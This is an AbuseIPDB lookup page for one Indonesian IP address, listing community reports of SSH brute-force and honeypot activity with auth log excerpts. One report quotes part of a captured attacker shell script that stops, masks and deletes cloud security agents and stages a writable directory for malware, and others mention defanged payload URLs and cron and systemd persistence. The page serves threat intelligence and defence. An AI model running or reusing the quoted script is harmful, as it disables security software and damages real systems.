JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 103.59.160.195

103.59.160.195 was found in our database!

This IP was reported 577 times. Confidence of Abuse is 8%: ?

ISP	PT Gunung Sedayu Sentosa
Usage Type	Commercial
ASN	AS150493
Hostname(s)	ip-103-59-160-195.indovm.com
Domain Name	gss.biz.id
Country	🇮🇩 Indonesia
City	Jakarta, Jakarta

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 103.59.160.195

Whois 103.59.160.195

IP Abuse Reports for 103.59.160.195:

This IP address has been reported a total of 577 times from 319 distinct sources. 103.59.160.195 was first reported on November 20th 2025, and the most recent report was 3 weeks ago.

Old Reports: The most recent abuse report for this IP address is from 3 weeks ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇩🇪 bogdanv	2026-05-27 14:03:47 (3 weeks ago)	$f2bV_matches	Brute-Force SSH
🇮🇳 evicky2002	2026-05-14 06:00:00 (1 month ago)	Confirmed malicious by STILWaters CTI platform (score=100, sources=3)	Hacking Brute-Force SSH
🇩🇪 bogdanv	2026-03-29 13:56:53 (2 months ago)	$f2bV_matches	Brute-Force SSH
🇯🇵 rafale2k	2026-03-20 18:39:21 (3 months ago)	SSH Brute Force	Brute-Force SSH
🇺🇸 psh-ack	2026-03-06 10:12:41 (3 months ago)	used PuTTY client to connect with root/redhat credentials. Initial shell script attempted to identif ... show more used PuTTY client to connect with root/redhat credentials. Initial shell script attempted to identify a writable directory across common locations (/tmp, /var/tmp, /dev/shm, /usr, /bin, /home, /root) for staging malware, indicating preparation for payload delivery. Script prioritizes /tmp as default fallback. Second command probed systemctl functionality and checked for gcc.pid file in /var/run—likely reconnaissance to detect existing compromises or system state before executing payload. No successful malware downloads, persistence mechanisms, or lateral movement observed in this session. Attack demonstrates typical botnet reconnaissance patterns before payload staging, consistent with opportunistic credential scanning campaigns. show less	Brute-Force SSH
🇯🇵 Execoop	2026-03-05 22:08:24 (3 months ago)	SSH honeypot \| Persistence Install + Defense Evasion \| 1 auths, 2 cmds, 1s \| putty \| tactics: cron p ... show more SSH honeypot \| Persistence Install + Defense Evasion \| 1 auths, 2 cmds, 1s \| putty \| tactics: cron persistence, security disabled, systemd persistence \| URLs: hxxp://$SERVER_IP/vos[.]txt, hxxp://$SERVER_IP/vox[.]txt show less	Hacking Exploited Host SSH
🇫🇮 misfit	2026-03-05 14:28:06 (3 months ago)	SSH brute-force (1 attempts). Org: AS150493 PT Gunung Sedayu Sentosa, Jakarta, ID.	Brute-Force SSH
🇩🇪 AnonDrop	2026-03-05 05:53:53 (3 months ago)	Malware download/execution attempt - Commands: #!/bin/sh wdir="/tmp" for i in "/tmp" "/var/tmp" "/d ... show more Malware download/execution attempt - Commands: #!/bin/sh wdir="/tmp" for i in "/tmp" "/var/tmp" "/dev/shm" "/usr" "/bin" "/home" "/root"; do if [ -w "$i" ]; then wdir="$i" break fi done cd "$wdir" \|\| exit 1 systemctl stop aegis >/dev/null 2>&1 systemctl disable aegis >/dev/null 2>&1 systemctl stop aliyun >/dev/null 2>&1 systemctl disable aliyun >/dev/null 2>&1 systemctl mask aegis >/dev/null 2>&1 systemctl mask aliyun >/dev/null 2>&1 systemctl daemon-reload if command -v chattr >/dev/null 2>&1; then chattr -R -i -a /usr/local/aegis/ >/dev/null 2>&1 fi pkill -9 AliYunDun >/dev/null 2>&1 pkill -9 AliYunDunMonitor >/dev/null 2>&1 pkill -9 aegis_update >/dev/null 2>&1 pkill -9 CmsGoAgent >/dev/null 2>&1 rm -rf /usr/local/aegis >/dev/null 2>&1 rm -rf /etc/init.d/aegis >/dev/null 2>&1 mkdir -p /usr/local/aegis if command -v chattr >/dev/null 2>&1; then chattr +i /usr/local/aegis fi systemctl stop YDService >/dev/null 2>&1 systemctl disable YDService >/dev/null ... show less	Hacking
🇺🇸 heyzg	2026-03-05 05:51:16 (3 months ago)	SSH honeypot \| Persistence Install + Defense Evasion \| 1 auths, 2 cmds, 3s \| putty \| tactics: cron p ... show more SSH honeypot \| Persistence Install + Defense Evasion \| 1 auths, 2 cmds, 3s \| putty \| tactics: cron persistence, security disabled, systemd persistence \| URLs: hxxp://$SERVER_IP/vos[.]txt, hxxp://$SERVER_IP/vox[.]txt show less	Hacking Exploited Host SSH
🇹🇷 rtbh.com.tr	2026-03-01 20:11:49 (3 months ago)	list.rtbh.com.tr report: tcp/0	Brute-Force
🇹🇷 rtbh.com.tr	2026-02-28 20:11:48 (3 months ago)	list.rtbh.com.tr report: tcp/0	Brute-Force
🇫🇷 Datenautobahn	2026-02-28 15:01:12 (3 months ago)	Feb 28 15:01:03 trusting-bouman sshd-session[113125]: pam_unix(sshd:auth): authentication failure; l ... show more Feb 28 15:01:03 trusting-bouman sshd-session[113125]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=103.59.160.195 user=root Feb 28 15:01:05 trusting-bouman sshd-session[113125]: Failed password for root from 103.59.160.195 port 59600 ssh2 Feb 28 15:01:07 trusting-bouman sshd-session[113125]: Failed password for root from 103.59.160.195 port 59600 ssh2 Feb 28 15:01:10 trusting-bouman sshd-session[113125]: Failed password for root from 103.59.160.195 port 59600 ssh2 ... show less	Brute-Force SSH
🇫🇷 tecnicorioja	2026-02-28 15:00:19 (3 months ago)	Failed password for root Feb 28 12:42:45 port 12818	Brute-Force SSH
🇺🇸 ras07	2026-02-28 15:00:03 (3 months ago)	SSH login attempts with user root.	Brute-Force SSH
🇩🇪 mueslo	2026-02-28 14:59:37 (3 months ago)	2026-02-28T09:56:07.358079+01:00 hyperion sshd-session[528569]: Failed password for root from 103.59 ... show more 2026-02-28T09:56:07.358079+01:00 hyperion sshd-session[528569]: Failed password for root from 103.59.160.195 port 30592 ssh2 2026-02-28T09:56:10.473286+01:00 hyperion sshd-session[528569]: Failed password for root from 103.59.160.195 port 30592 ssh2 2026-02-28T15:59:27.805030+01:00 hyperion sshd-session[566063]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=103.59.160.195 user=root 2026-02-28T15:59:29.518767+01:00 hyperion sshd-session[566063]: Failed password for root from 103.59.160.195 port 60060 ssh2 2026-02-28T15:59:32.467631+01:00 hyperion sshd-session[566063]: Failed password for root from 103.59.160.195 port 60060 ssh2 2026-02-28T15:59:36.297428+01:00 hyperion sshd-session[566063]: Failed password for root from 103.59.160.195 port 60060 ssh2 show less	Brute-Force SSH

Showing 1 to 15 of 577 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇫🇮 45.87.249.146

🇬🇧 45.82.76.116

🇺🇸 2607:f8b0:4001:c61::129

🇧🇷 189.113.47.155

🇵🇪 179.6.52.136

🇨🇴 152.203.58.169

🇫🇮 147.185.133.23

🇻🇳 103.176.20.115

🇮🇹 93.92.77.146

🇺🇸 82.117.252.121

🇺🇸 66.132.195.18

🇬🇧 35.203.211.94

🇺🇸 34.181.204.251

🇷🇺 31.173.247.254

🇺🇸 184.105.247.247

🇰🇷 122.35.192.33

🇧🇩 103.179.14.214

🇺🇸 100.58.246.217

🇫🇷 85.217.140.50

🇫🇷 85.217.140.37